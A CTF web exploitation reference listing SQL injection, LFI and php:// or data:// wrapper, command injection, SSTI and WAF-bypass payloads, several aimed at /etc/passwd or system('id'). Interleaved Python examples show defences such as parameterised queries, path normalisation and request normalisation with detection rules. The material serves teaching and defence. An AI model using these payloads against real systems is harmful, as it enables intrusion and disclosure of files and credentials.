
Web Application Pentesting

Common web vulnerabilities and exploitation techniques for CTF

CTF Web Exploitation Reference

Focused reference for web challenges in CTF competitions.


Initial Enumeration

BASH
# First steps
curl -I https://target.com          # Response headers (server, framework, cookies)
curl https://target.com/robots.txt  # Disallowed paths
curl https://target.com/.git/HEAD   # Exposed .git directory (source recovery)

# Source code analysis (manual, in the browser)
# - View page source (Ctrl+U)
# - Read every linked JavaScript file
# - Look for developer comments and commented-out endpoints

PHP Specific

Type Juggling

PHP
# Loose comparison (==) converts the operands before comparing them
var_dump("0e123" == "0e456");   # bool(true)  both are numeric strings: 0 * 10^123 == 0 * 10^456
var_dump(0 == "string");        # bool(true)  in PHP < 8; bool(false) from PHP 8 (non-numeric strings are no longer cast to 0)
var_dump("10" == 10);           # bool(true)
var_dump("0e123" === "0e456");  # bool(false) strict comparison (===) checks type and bytes

# Bypass: ?password=0 when checking against "0e..." hash

Magic Hash Collisions

TEXT
# Input        MD5 (starts with 0e followed only by digits, so == reads it as 0)
240610708      0e462097431906509019562988736854
QNKCDZO        0e830400451993494058024219903391
s878926199a    0e545993274517709034328855841020
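The following is an added example (not part of the original reference) that emulates PHP's loose string comparison in Python, recomputes the three MD5 values listed above so the claim can be checked locally, and contrasts the vulnerable `==` check with the strict comparison a fixed application would use. The numeric-string regex is a simplification of PHP's rules, sufficient for the `0e…` case; the `check_password` helper is hypothetical.

```python
import hashlib
import re

# Simplified shape of a PHP numeric string: optional sign, digits, optional
# fraction and exponent. "0e<digits>" fits, and its value is 0 * 10^n == 0.0.
PHP_NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

# Inputs listed in the reference above (constructed here as plain strings)
MAGIC_INPUTS = ["240610708", "QNKCDZO", "s878926199a"]


def php_loose_equal(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: numeric comparison when both look
    numeric, byte comparison otherwise (this rule holds in every PHP version)."""
    if PHP_NUMERIC_STRING.match(a) and PHP_NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """True when a hex digest is '0e' followed only by digits,
    i.e. PHP's == would treat it as the number 0."""
    return re.fullmatch(r"0e[0-9]+", hexdigest) is not None


def magic_md5_table() -> dict:
    """Recompute the md5 of each listed input so the table can be verified."""
    return {s: hashlib.md5(s.encode()).hexdigest() for s in MAGIC_INPUTS}


def check_password(stored_md5: str, supplied: str) -> dict:
    """Hypothetical login check: the vulnerable `md5($in) == $stored` form
    beside a strict byte comparison (what === or hash_equals() gives in PHP)."""
    supplied_md5 = hashlib.md5(supplied.encode()).hexdigest()
    return {
        "loose": php_loose_equal(supplied_md5, stored_md5),
        "strict": supplied_md5 == stored_md5,
    }


if __name__ == "__main__":
    table = magic_md5_table()
    for word, digest in table.items():
        print(f"{word:<12} {digest}  magic={is_magic_hash(digest)}")
    # A stored hash for QNKCDZO is "matched" by the unrelated input 240610708
    print(check_password(stored_md5=table["QNKCDZO"], supplied="240610708"))
```

The fix on the PHP side is to compare digests with `===` or `hash_equals()`, which never perform numeric conversion; `is_magic_hash` is useful when auditing a stored credential table for entries that would be affected by a loose comparison.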

Array Injection

PHP
# strcmp() with an array argument returns NULL (plus a warning) in PHP < 8;
# NULL == 0 is true, so the "match" branch is taken. PHP 8 throws a TypeError instead.
strcmp($_GET['pass'], 'secret') == 0
# Bypass: ?pass[]=anything

# md5() array bypass: md5(array) returns NULL with a warning in PHP < 8, so NULL == NULL
md5($_GET['x']) == md5($_GET['y'])
# Bypass: ?x[]=a&y[]=b (both return NULL)

Dangerous Functions

PHP
eval()           # Code execution
system()         # Command execution
assert()         # Code execution when passed a string (PHP 5 and 7; removed in PHP 8)
preg_replace()   # RCE with /e modifier (removed in PHP 7)
unserialize()    # Object injection
include()        # LFI/RFI

SQL Injection

Authentication Bypass

SQL
admin' --
admin' #
' OR '1'='1' --
' OR 1=1 --
admin'/*

Data Extraction

SQL
' UNION SELECT 1,2,3 --
' UNION SELECT null,table_name,null FROM information_schema.tables --
' UNION SELECT null,column_name,null FROM information_schema.columns WHERE table_name='users' --
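Added example (not from the original reference) showing why the authentication-bypass and UNION payloads above work against a string-built query and do nothing against a parameterised one. It uses Python's built-in `sqlite3` with a constructed in-memory `users` table; the table name `sqlite_master` in the test plays the role `information_schema.tables` plays on MySQL.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for a challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """String-built query: the input is parsed as SQL, so a quote ends the
    literal and `--` comments out the password check."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver binds the input as a value, so the same
    payloads are just unusual usernames that match nothing."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = build_db()
    for payload in ["admin' --", "' OR 1=1 --", "' UNION SELECT name FROM sqlite_master --"]:
        print(f"{payload!r:50} vulnerable={login_vulnerable(db, payload, 'x')} safe={login_safe(db, payload, 'x')}")
```

The contrast is the whole lesson: the safe version never changes the SQL grammar, so there is nothing for a quote or comment sequence to break out of.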

Local File Inclusion

Basic LFI

TEXT
?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc/passwd

PHP Wrappers

TEXT
# Base64 encode source
?page=php://filter/convert.base64-encode/resource=index.php

# Execute code (if allow_url_include=On)
?page=php://input
POST: <?php system('id'); ?>

# Data wrapper
?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
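Added example (not code from the original reference) of a `?page=` resolver that handles every evasion listed in the two blocks above: URL-encoded separators, the `....//` trick that survives a naive `../` strip, absolute paths, NUL bytes and `php://` / `data://` wrappers. The root path `/var/www/app/pages` is a constructed placeholder and the check is purely lexical, so nothing is read from disk.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for the demo; the check is lexical, nothing is opened.
PAGES_ROOT = "/var/www/app/pages"


def naive_strip(param: str) -> str:
    """The filter the '....//' payload above is built to beat: a single pass
    of removing '../' leaves a fresh '../' behind."""
    return param.replace("../", "")


def resolve_page(param: str, root: str = PAGES_ROOT):
    """Return the absolute file path a `?page=` value would include, or None
    when it must be rejected. Decodes twice (some stacks decode once before the
    application does), refuses any scheme or stream wrapper and NUL bytes, then
    normalises and checks the result is still under the root."""
    decoded = unquote(unquote(param))
    if "://" in decoded or "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # normpath has collapsed every '..' already, so a prefix test on the
    # normalised path suffices; commonpath avoids the "/pages" vs "/pages2" pitfall
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for p in ["about.php", "../../../etc/passwd", "....//....//....//etc/passwd",
              "..%2f..%2f..%2fetc/passwd", "/etc/passwd",
              "php://filter/convert.base64-encode/resource=index.php",
              "data://text/plain,<?php system('id'); ?>"]:
        print(f"{p:60} -> {resolve_page(p)}")
    print("naive strip:", naive_strip("....//....//....//etc/passwd"))
```

Note that `....//` is not a traversal at all once the path is normalised (the `....` components are literal directory names); it only becomes `../../../` after a strip-based filter has mangled it, which is why normalising and then checking the prefix is preferable to blocklisting substrings.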

Command Injection

BASH
; id
| id
|| id
& id
&& id
`id`
$(id)

# Bypass spaces
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
{cat,/etc/passwd}
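Added example (not from the original reference) contrasting a `shell=True` call, where every separator and the `${IFS}` space bypass above are interpreted by `/bin/sh`, with an argv-list call where the same input is a single argument. `echo` stands in for whatever command the application wraps, and the hostname validator is a hypothetical allowlist check; the inputs are constructed.

```python
import re
import subprocess

# RFC-1123-style hostname labels: letters, digits and hyphens, dot-separated
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,62}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,62}[A-Za-z0-9])?)*$"
)


def run_vulnerable(user_input: str) -> str:
    """shell=True hands the whole string to /bin/sh, so ; | && ` $( ) and
    ${IFS} are all interpreted as shell syntax."""
    proc = subprocess.run(f"echo {user_input}", shell=True, capture_output=True, text=True)
    return proc.stdout


def run_safe(user_input: str) -> str:
    """An argv list with no shell: the input is one argument to echo,
    whatever characters it contains."""
    proc = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return proc.stdout


def is_valid_hostname(value: str) -> bool:
    """Allowlist check to apply before the argv call; rejects every
    separator and expansion character in the list above."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


if __name__ == "__main__":
    for payload in ["host; echo INJECTED", "host;echo${IFS}INJECTED", "example.com"]:
        print(f"{payload!r:32} valid={is_valid_hostname(payload)}")
        print("  shell=True :", run_vulnerable(payload).rstrip().replace("\n", " | "))
        print("  argv list  :", run_safe(payload).rstrip())
```

The argv form removes the shell from the path entirely; the allowlist is a second layer that also stops arguments such as `-n` or `--flag` from being read as options by the wrapped program.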

SSTI Detection

TEXT
{{7*7}}        # Jinja2/Twig → 49
${7*7}         # FreeMarker → 49
<%= 7*7 %>     # ERB → 49
#{7*7}         # Thymeleaf → 49

Flag Discovery

TEXT
# Common file locations
/flag, /flag.txt, /home/*/flag*
./flag, ../flag, ../../flag

# Environment variables (template object dump or shell)
{{config}}, ${env}, printenv

# Database
' UNION SELECT flag FROM flags --

Useful Bypasses

Extension Bypass

TEXT
.php.phtml, .php5, .phar
.php.php%00.jpg (null byte, old PHP)
.php.PhP (case)

WAF Bypass

TEXT
# Spaces
%09, %0a, +, /**/

# Keywords
SeLeCt, UN/**/ION, concat()
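Added example (not part of the original reference) that serves this WAF Bypass section and the SSTI Detection section above from the defender's side: it normalises a request line the way a filter must before matching (double URL-decode, strip `/**/` comments, map `%09`, `%0a` and `+` to a space, fold case) and runs a few rules over constructed access-log lines. The `naive_match` function shows what a raw-string signature misses; the rule names and sample lines are invented for the demo.

```python
import re
from urllib.parse import unquote

# Constructed request lines in access-log style (not real traffic)
SAMPLE_REQUESTS = [
    "GET /item?id=1 HTTP/1.1",
    "GET /item?id=1%27%20UN/**/ION%09SeLeCt%20null,table_name,null%20FROM%20information_schema.tables-- HTTP/1.1",
    "GET /login?user=admin%27+--+&pass=x HTTP/1.1",
    "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1",
    "GET /search?q=select+a+book+about+unions HTTP/1.1",
]

# Detections applied to the normalised line, named by the technique they target
RULES = {
    "sqli_union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "sqli_quote_break": re.compile(r"'\s*(or\b|and\b|union\b|--|#|/\*)"),
    "ssti_probe": re.compile(r"(\{\{|\$\{|<%=|#\{)\s*\d+\s*\*\s*\d+"),
}


def normalize(raw: str) -> str:
    """Undo the evasions from the list above: double URL-decode, drop inline
    comments (UN/**/ION -> UNION), turn tab/newline/+ into a plain space,
    collapse whitespace runs and lower-case the result."""
    s = unquote(unquote(raw))
    s = re.sub(r"/\*.*?\*/", "", s)
    s = re.sub(r"[\t\n\r+]+", " ", s)
    s = re.sub(r" {2,}", " ", s)
    return s.lower()


def naive_match(raw: str) -> bool:
    """A signature applied to the raw line: case-folded but not decoded or
    comment-stripped, so every obfuscated sample slips past it."""
    return "union select" in raw.lower() or "{{7*7}}" in raw


def classify(request_line: str) -> list:
    """Return the sorted names of the rules that fire on the normalised line."""
    normalized = normalize(request_line)
    return sorted(name for name, rule in RULES.items() if rule.search(normalized))


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"naive={naive_match(line)!s:5} rules={classify(line)}  {line}")
```

The last sample line is there to show the other half of the problem: a bare keyword list (`select`, `union`) fires on ordinary search terms, so the rules require a quote break or the `union ... select` pair rather than single words.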